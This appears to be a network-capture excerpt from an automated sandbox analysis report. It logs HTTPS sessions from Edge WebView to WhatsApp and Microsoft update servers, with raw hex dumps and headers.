                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63
                                                                                                                                                                                                                Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a
                                                                                                                                                                                                                Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
                                                                                                                                                                                                                2024-03-10 16:46:18 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                13192.168.2.44977631.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:27 UTC732OUTPOST /wa_qpl_data HTTP/1.1
                                                                                                                                                                                                                Host: graph.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 1185
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfnqh0ldmvfVBiBst
                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                Referer: https://web.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:27 UTC1185OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 66 6e 71 68 30 6c 64 6d 76 66 56 42 69 42 73 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 30 36 33 31 32 37 37 35 37 31 31 33 33 39 39 7c 37 34 35 31 34 36 66 66 61 33 34 34 31 33 66 39 64 62 62 35 34 36 39 66 35 33 37 30 62 37 61 66 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 66 6e 71 68 30 6c 64 6d 76 66 56 42 69 42 73 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 70 70 5f 69 64 22 0d 0a 0d 0a 31 36 37 30 32 38 36 39 30 35 33 35 33 32 32 0d
                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundaryfnqh0ldmvfVBiBstContent-Disposition: form-data; name="access_token"1063127757113399|745146ffa34413f9dbb5469f5370b7af------WebKitFormBoundaryfnqh0ldmvfVBiBstContent-Disposition: form-data; name="app_id"167028690535322
                                                                                                                                                                                                                2024-03-10 16:46:28 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                facebook-api-version: v13.0
                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                x-fb-request-id: AD0OWqhh_h10IKbJgMd1SmV
                                                                                                                                                                                                                x-fb-trace-id: FaaAeVHJEJK
                                                                                                                                                                                                                x-fb-rev: 1011958436
                                                                                                                                                                                                                X-FB-Debug: pbxTVl63ftbUcImdqMLHlfOdao+wF5mkueRPfycRlsnVKL4PpRNdUo5vb2SN2YxMLI28TlhvzMSWwDSX6i5XZw==
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:28 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Content-Length: 22
                                                                                                                                                                                                                2024-03-10 16:46:28 UTC22INData Raw: 7b 0a 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 0a 7d
                                                                                                                                                                                                                Data Ascii: { "success": true}


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                14192.168.2.44977731.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:37 UTC590OUTGET /ws/chat HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                Sec-WebSocket-Key: KnIcaFPv2DOKiufKDszV5Q==
                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                2024-03-10 16:46:38 UTC63INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:38 GMT
                                                                                                                                                                                                                2024-03-10 16:46:38 UTC2595INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4c 4b 62 73 7a 43 70 6b 4d 52 66 30 5f 64 68 4a 66 35 63 4b 44 71 59 63 79 38 48 31 36 55 30 41 33 43 7a 48 42 79 49 6c 74 56 58 63 71 52 6c 51 38 62 75 77 61 4e 61 37 46 38 6a 41 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 4b 63 70 32 54 48 30 69 4f 6b 49 57 4a 6b 6f 77 4f 46 68 50 33 38 74 51 55 66 35 6a 37 36 42 4b 78 30 77 79 4a 53 41 62 4f 76 64 2d 64 5a 6d 7a 75 2d 4a 66 64 70 55 79 4c 6f 65 52 6c 6f 35 61 64 61 30 6c 4e 59 4e 33 54 65 4f 6d 64 4b 57 63 65 78 43 4b 72 48 38 50 37 61 79 62 71 37 64 35 70 2d 38 53 43 61 30 4d 68 70 5a 66 5f 69 4b 67 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcLKbszCpkMRf0_dhJf5cKDqYcy8H16U0A3CzHByIltVXcqRlQ8buwaNa7F8jA"; e_clientaddr="AcKcp2TH0iOkIWJkowOFhP38tQUf5j76BKx0wyJSAbOvd-dZmzu-JfdpUyLoeRlo5ada0lNYN3TeOmdKWcexCKrH8P7aybq7d5p-8SCa0MhpZf_iKg"; e_fb_


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                15192.168.2.44977831.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:43 UTC590OUTGET /ws/chat HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                Sec-WebSocket-Key: qL2A+XHMyKyLf8i3ZVUwIA==
                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                2024-03-10 16:46:43 UTC63INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:43 GMT
                                                                                                                                                                                                                2024-03-10 16:46:43 UTC2592INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4a 38 67 5f 36 71 58 6d 71 69 4c 75 55 6a 72 36 57 44 32 6a 4a 75 72 62 39 2d 63 70 6c 71 72 4d 4a 34 34 31 71 49 55 34 54 69 4e 5f 4d 74 47 59 35 57 55 6b 6c 4a 35 65 77 74 6f 41 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 49 67 6d 54 39 76 64 38 33 53 52 32 2d 4a 6b 41 43 72 70 4b 65 6a 4c 35 34 64 66 4d 53 48 4e 75 5f 63 6f 5a 66 6b 34 71 63 76 4c 39 52 73 37 43 70 30 52 53 71 65 37 51 75 45 70 45 48 42 62 6f 73 35 73 35 67 56 77 64 47 54 46 6d 6f 68 63 6c 52 53 57 72 6b 62 73 72 4c 32 72 53 4f 34 71 33 6c 65 5a 63 68 37 66 32 61 49 64 4f 78 42 22 3b 20 65 5f 66 62 5f 76 69
                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcJ8g_6qXmqiLuUjr6WD2jJurb9-cplqrMJ441qIU4TiN_MtGY5WUklJ5ewtoA"; e_clientaddr="AcIgmT9vd83SR2-JkACrpKejL54dfMSHNu_coZfk4qcvL9Rs7Cp0RSqe7QuEpEHBbos5s5gVwdGTFmohclRSWrkbsrL2rSO4q3leZch7f2aIdOxB"; e_fb_vi


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                16192.168.2.44977931.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:58 UTC590OUTGET /ws/chat HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                Sec-WebSocket-Key: tHyZpMHuCa2yekMex+wUTg==
                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                2024-03-10 16:46:58 UTC63INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:58 GMT
                                                                                                                                                                                                                2024-03-10 16:46:58 UTC2591INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4b 66 70 62 32 62 47 39 34 37 64 5a 6d 4b 47 69 4d 4a 31 68 71 54 33 30 6f 67 4c 74 64 55 6e 6e 4d 6a 4a 41 50 70 32 5f 46 74 30 4b 54 74 49 4a 66 51 64 6e 46 47 4c 44 65 6b 72 77 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 49 5a 64 43 54 33 47 44 4c 77 76 65 61 76 38 51 45 4d 76 7a 4d 41 33 52 65 4a 77 61 45 69 7a 64 50 6a 63 54 52 37 76 42 45 66 47 31 4e 5f 59 35 62 37 39 42 72 41 4b 57 66 76 64 53 68 79 78 4a 32 38 65 33 71 72 39 55 30 4b 62 74 47 77 38 67 6e 2d 42 7a 76 45 6c 71 6d 61 61 68 48 68 39 42 77 6f 79 4c 41 36 4b 72 4d 67 53 43 77 74 71 51 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcKfpb2bG947dZmKGiMJ1hqT30ogLtdUnnMjJAPp2_Ft0KTtIJfQdnFGLDekrw"; e_clientaddr="AcIZdCT3GDLwveav8QEMvzMA3ReJwaEizdPjcTR7vBEfG1N_Y5b79BrAKWfvdShyxJ28e3qr9U0KbtGw8gn-BzvElqmaahHh9BwoyLA6KrMgSCwtqQ"; e_fb_


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                17192.168.2.449780204.79.197.2394433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC1284OUTPOST /componentupdater/api/v1/update?cup2key=6:DGgYcGaw9n72ofxa1bSuHARKsVbWbDHIqW7qaa1jqQo&cup2hreq=9bd91ebdf36ce1eabda79246ea8837da44429b5fd34d7ec7853cf1db632b35c7 HTTP/1.1
                                                                                                                                                                                                                Host: edge.microsoft.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 4923
                                                                                                                                                                                                                X-Microsoft-Update-AppId: kpfehajjjbbcifeehjgfgnabifknmdad,oankkpibpaokgecfckkdkgaoafllipag,eeobbhfgfagbclfofmgbdfoicabjdbkn,ohckeflnhegojcjlcpbfpciadgikcohk,fppmbhmldokgmleojlplaaodlkibgikh,fgbafbciocncjfbbonhocjaohoknlaco,ahmaebgpfccdhgidjaidaoojjcijckba,alpjnmnfbgfkmmpcfpejmmoebdndedno,ndikpojcjlepofdkaaldkinkjbeeebkl,jbfaflocpnkhbgcijpkiafdpbjkedane,ojblfafjmiikbkepnnolpgbbhejhlcim
                                                                                                                                                                                                                X-Microsoft-Update-Interactivity: bg
                                                                                                                                                                                                                X-Microsoft-Update-Service-Cohort: 7912
                                                                                                                                                                                                                X-Microsoft-Update-Updater: msedge-117.0.2045.47
                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                Sec-Mesh-Client-WebView: 1
                                                                                                                                                                                                                X-Client-Data: CLv3ygE=
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC4923OUTData Raw: 7b 22 72 65 71 75 65 73 74 22 3a 7b 22 40 6f 73 22 3a 22 77 69 6e 22 2c 22 40 75 70 64 61 74 65 72 22 3a 22 6d 73 65 64 67 65 22 2c 22 61 63 63 65 70 74 66 6f 72 6d 61 74 22 3a 22 63 72 78 33 2c 70 75 66 66 22 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6b 70 66 65 68 61 6a 6a 6a 62 62 63 69 66 65 65 68 6a 67 66 67 6e 61 62 69 66 6b 6e 6d 64 61 64 22 2c 22 62 72 61 6e 64 22 3a 22 47 47 4c 53 22 2c 22 63 6f 68 6f 72 74 22 3a 22 72 72 66 40 30 2e 39 34 22 2c 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 69 6e 73 74 61 6c 6c 64 61 74 65 22 3a 2d 31 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 47 42 22 2c 22 70 69 6e 67 22 3a 7b 22 72 22 3a 2d 32 7d 2c 22 74 61 72 67 65 74 69 6e 67 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 41 70 70 43 6f 68 6f 72 74 22 3a
                                                                                                                                                                                                                Data Ascii: {"request":{"@os":"win","@updater":"msedge","acceptformat":"crx3,puff","app":[{"appid":"kpfehajjjbbcifeehjgfgnabifknmdad","brand":"GGLS","cohort":"rrf@0.94","enabled":true,"installdate":-1,"lang":"en-GB","ping":{"r":-2},"targetingattributes":{"AppCohort":
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Content-Length: 9798
                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                Content-Encoding: identity
                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                ETag: 3046022100C1BB2134460CBE2BBB201F2ED74D4BB013AFE455E24B10E65EEF67E233007630022100CE56CEC9D9CE5F964E94D75028F0A19DEF6D320077285119B8B3B141AFE825BC:9bd91ebdf36ce1eabda79246ea8837da44429b5fd34d7ec7853cf1db632b35c7
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                x-cup-server-proof: 3046022100C1BB2134460CBE2BBB201F2ED74D4BB013AFE455E24B10E65EEF67E233007630022100CE56CEC9D9CE5F964E94D75028F0A19DEF6D320077285119B8B3B141AFE825BC:9bd91ebdf36ce1eabda79246ea8837da44429b5fd34d7ec7853cf1db632b35c7
                                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 0761527FAFFE46A78616D1F87E0495F3 Ref B: LAX311000112019 Ref C: 2024-03-10T16:47:03Z
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:47:03 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC2112INData Raw: 29 5d 7d 27 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 70 72 6f 64 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 33 2e 31 22 2c 22 64 61 79 73 74 61 72 74 22 3a 7b 22 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 22 3a 33 2c 22 65 6c 61 70 73 65 64 5f 64 61 79 73 22 3a 36 32 37 38 2e 36 39 39 33 34 34 32 36 37 31 35 35 35 7d 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6b 70 66 65 68 61 6a 6a 6a 62 62 63 69 66 65 65 68 6a 67 66 67 6e 61 62 69 66 6b 6e 6d 64 61 64 22 2c 22 63 6f 68 6f 72 74 22 3a 22 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b
                                                                                                                                                                                                                Data Ascii: )]}'{"response":{"server":"prod","protocol":"3.1","daystart":{"elapsed_seconds":3,"elapsed_days":6278.6993442671555},"app":[{"appid":"kpfehajjjbbcifeehjgfgnabifknmdad","cohort":"","status":"ok","cohortname":"","updatecheck":{"status":"ok","urls":{"url":[
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC1147INData Raw: 31 62 39 65 30 39 65 64 63 64 2f 70 69 65 63 65 73 68 61 73 68 22 2c 22 48 61 73 68 4f 66 48 61 73 68 65 73 22 3a 22 56 35 46 77 4e 63 38 47 4f 2b 47 33 46 64 58 6d 2b 58 79 30 55 4d 64 50 6b 31 5a 39 32 4b 6f 62 6f 36 61 69 2f 32 58 73 73 65 30 3d 22 7d 7d 7d 7d 5d 7d 2c 22 61 72 67 75 6d 65 6e 74 73 22 3a 22 22 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 65 65 6f 62 62 68 66 67 66 61 67 62 63 6c 66 6f 66 6d 67 62 64 66 6f 69 63 61 62 6a 64 62 6b 6e 22 2c 22 63 6f 68 6f 72 74 22 3a 22 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74
                                                                                                                                                                                                                Data Ascii: 1b9e09edcd/pieceshash","HashOfHashes":"V5FwNc8GO+G3FdXm+Xy0UMdPk1Z92Kobo6ai/2Xsse0="}}}}]},"arguments":""}}},{"appid":"eeobbhfgfagbclfofmgbdfoicabjdbkn","cohort":"","status":"ok","cohortname":"","updatecheck":{"status":"ok","urls":{"url":[{"codebase":"htt
